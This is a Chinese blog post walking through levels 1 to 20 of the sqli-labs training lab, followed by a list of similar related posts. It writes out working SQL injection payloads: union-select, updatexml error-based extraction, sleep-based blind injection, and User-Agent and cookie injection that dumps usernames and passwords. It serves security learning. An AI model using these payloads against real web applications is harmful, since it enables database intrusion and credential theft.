网安学习-sqlli通关1-20

已于 2023-08-23 21:27:46 修改
阅读量69 收藏
点赞数
分类专栏: sqlli通关 文章标签: 网络安全
于 2023-08-23 21:27:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ty5930963/article/details/132433441
版权

第一关

第一关可以使用联合注入查询来进行爆破,首先使用HackBar 后输入?id=1 出现正常回显,接着用order by 查看有多少回显点 发现是3, 语句为:http://www.123.com/Less-1/?id=1 order by --+ 

 知道回显后,可以使用union select  1,2,3 发现回显位置 。http://www.123.com/Less-1/?id=-1'union select 1,2,3--+,

接着使用user()l来爆出使用者的名 

 第二关

先判断数据类型 用1/1发现正常 1/0不正常,说明数据为数字型

 然后使用联合注入查询,union select  1,2,3  查询语句:http://www.123.com/Less-2/
?id=-1 union  select 1,2,3 --+ ,后续和第一关相同

第三关

首先用一个引号发现报错,两个不报错,所以先加上一个单引号,http://www.123.com/Less-3/
?id=1'and 1=1--+,发现报错,然后尝试使用union 来,发现报错,通过提示信息,可能是括号木有不合,

 

 然后加了一个括号再试,发现成功,所以,在注入时,要看闭合问题,比如括号等,后续就和第一关相似了

 

 第四关

首先判断为字节型, 加单引号都没有变化,然后加双引号后发现出现报错,http://www.123.com/Less-4/?id=1" order by 1--+ 发现又是报错,通过分析报错语句,发现没有闭合,所以加括号后,可以成功。

 再次使用union,发现不可用,单有报错信息,可以尝试报错注入, http://www.123.com/Less-4/?id=1")and updatexml(1,concat(0x7e,database()),1)  --+,爆出数据库命,

 第五关

判断数据类型为字符型,加一个单引号报错,加两个正常输出,所以可以使用报错注入,爆出数据库名 http://www.123.com/Less-5/?id=1'and updatexml(1,concat(0x7e,database()),1)  --+

 第六关

判断数据类型为字符型,加单引号没有变化,加双引号出现变化,然后可以使用盲注,先构造轮子,发现1=1和1=0有差别,用if()函数,首先用bp抓包,然后用length爆出database()的长度,发现长度为8

然后可以用left来爆出database()的子符串 

 第七关

使用一个单引号发现出现问题,使用两个单引号恢复,当构造轮子后,发现页面有变化,但长度没有变,可以使用sleep()函数来找,发现

然后发现可以使用构造轮子的办法爆出数据库名 GET /Less-7/?id=1'))and+if(mid(database(),1,1)='s',sleep(5),0)=1--+ 

 第八关

首先用单引号,发现有变化,所以构造一个轮子1=1,然后发现可以使用,构造   /Less-8/?id=1'and+1=1--+ HTTP/1.1

 然后可以使用length爆出数据库名的长度,在爆出书库名

 

 第九关

思路于第八关相同

第十关

思路与第八关相同,只需将单引号变为双引号

第十一关

这一关以后,界面有了变化,输入用户名密码,出现界面,在admin后面加  admin' or 1=1--+,发现提示错误,

看语句分析,可以得到并没有将后面的注释掉,在换掉变成#号 ,登录成功。后续判断username是说什么类型数据,当输入1时出现错误,然后用联合注入1'union select 1,2#,

 第十二关

使用1和1'发现都没有变化,当输入1“时,发现产生报错信息,分析报错信息,需要添加一个括号来进行闭合 1”)or 1=1--+

 然后可以使用1“)union select 1,2#l来进行输出

 第十三关

输入1'产生报错信息,说明有sql注入,但补全后发现页面没有变化,只能使用盲注

先知道长度,然后爆破数据库名

 第十四关

使用1”出现了报错信息,然后1“or 1=1#页面没有变化,抓包,可能要使用盲注。所以构造轮子,发现1=1与1=0不同,可以使用盲注。1”or 1=1#

第十五关

使用1,1‘,1“页面都没有明显的变化,抓包以后,构造一个恒成立的式子来看,发现1’or 1=1#有变化,可以进行盲注

 所以直接使用盲注即可

第十六关

使用一个恒等式发现只有1”)or  1=1#可以进行盲注

第十七关

页面是一个密码重置页面,已经登录系统了,然后查看我们源码,如果账户名正确那么将密码改成你输入的密码。再执行这条sql语句之前会对输入的账户名进行检查,这里有一个update更新数据库里面信息。所以用到报错注入。

 

第十八关

通过下面的IP地址和抓到的包可以知道,此处可能存在UA注入

在UA头上写  1',1,updatexml(1,concat(0x5e,database()),1))#

第十九关

refer注入

第二十关

cookie注入

'and updatexml (1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#

ty5930963
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 850
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqlli-labs基本使用
u011417723的博客
03-04 974
sqlli-labs进行SQL注入
sqli-labs 1~10关教程
jiji_king的博客
04-04 5798
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
sql-liabs通关1-5
m0_62207170的博客
01-14 235
sqlliab通关
初学安装与配置:burp、sqllilabs搭建、sqlmap安装
weixin_49422491的博客
05-07 571
下载jdk和burpsuite安装包 将下载好的安装包拷贝到kali目录下,通过ls命令可查看如下图 1、首先检查有无gedit,如果没有,按照提示安装一个。 或者用命令安装 2、安装jdk (1)解压jdk压缩包 (2)移动目录并更改文件~/.bashrc 配置 在~/.bashrc 文件中添加的内容,添加好后保存退出。 注意:在export JAVA_HOME=/opt/jdk1.8.0_191这里,jdk1.8.0_191是你所安装的jdk包的名字,如果你安装的是jdk1.8.0_162,就将上面
sql语法大全
loveliupp的博客
11-29 202
一、基础 1、说明:创建数据库 CREATE DATABASE database-name  2、说明:删除数据库 drop database dbname 3、说明:备份sql server --- 创建 备份数据的 device USE master EXEC sp_addumpdevice 'disk', 'testBack', 'c:/mssql7backup/MyNwin
行业教育软件-学习软件-通关宝典执业考试练习软件 6.3.802.zip
08-03
行业教育软件-学习软件-通关宝典执业考试练习软件 6.3.802.zip
愤怒的小鸟水煮蛋1-15关通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15关通关录像
【问题解决】Sql-li-labs报错Error:Call to undefined function mysql_connect(),以及没有sql语句错误提示的解决
share something here
04-12 7961
搭建Sql-li-labs问题处理问题一问题二 问题一 因为小皮面板phpstudy默认安装的是7.x版本的php,高版本的php已经不再支持sql-li-labs其中一些命令,故为了兼容sql-li-labs,我们要采用低版本的php。 在软件管理,找到低版本的phpstudy,安装5.x版本的php 进入到网站管理界面,选择低版本php,之后访问sql-li-labs访问。 问题二 root用户数据库密码连接不上 在小皮面板数据库处的密码要和db-creds.inc文件内的密码一样。 ...
Sqlli_Lab_Page_1_Less_2
qq_45434762的博客
10-21 478
1.找注入点 正常显示 正常显示 显示异常,说明存在诸如点 2.求列数 不存在 判断出列数为3列 3.求显示位 没有报错显示,再1前面加一个-再次尝试 显示位为2,3 4.查看库名,连接数据库的用户等信息 5.求表名 6.求列名 7.拖库 ...
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3869
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
HTML5中本地数据库(SQLLite)的基础
ZhangYaohui专栏
05-06 1万+
在html5中,可以像访问本地文件那样轻松的对内置数据库进行直接访问。 html5中内置了两种数据库,一种为SQLLite,另一种为indexedDB。在js中使用SQLLite数据库的步骤:1.创建访问数据库的对象 var db = openDatabase("myDB","1.0","test db",1024*100);说明: 1. 该方法返回的是创建的数据库的对象,如果该数据
Sqli-labs介绍、下载、安装
weixin_34318272的博客
08-11 505
SQLI和sqli-labs介绍 SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL ,Oracle以及PostgresqlSql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的...
sqli-labs闯关指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-liabs通关之旅
weixin_42123571的博客
03-17 714
sqli-liabs通关之旅 第一关 加‘报错 加‘--+正常 ?id=-1' order by 3 --+ 页面正常 ?id=-1' order by 4 --+ 页面错误 判断字段长度为3 确定回显点: id=-1' union select 1,2,3--+ 猜数据库: -1' union select 1,database(),3--+ 猜表名: -1' union sele...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-labs通关1-5
最新发布
09-03
sqli-labs是一个SQL注入学习平台,通过完成一系列的关卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战关卡。 sqli-labs通关1关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2关:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3关:通关3关的方法没有在提供的引用中找到相关信息。 sqli-labs通关4关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs(1-65)通关讲解](https://blog.csdn.net/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值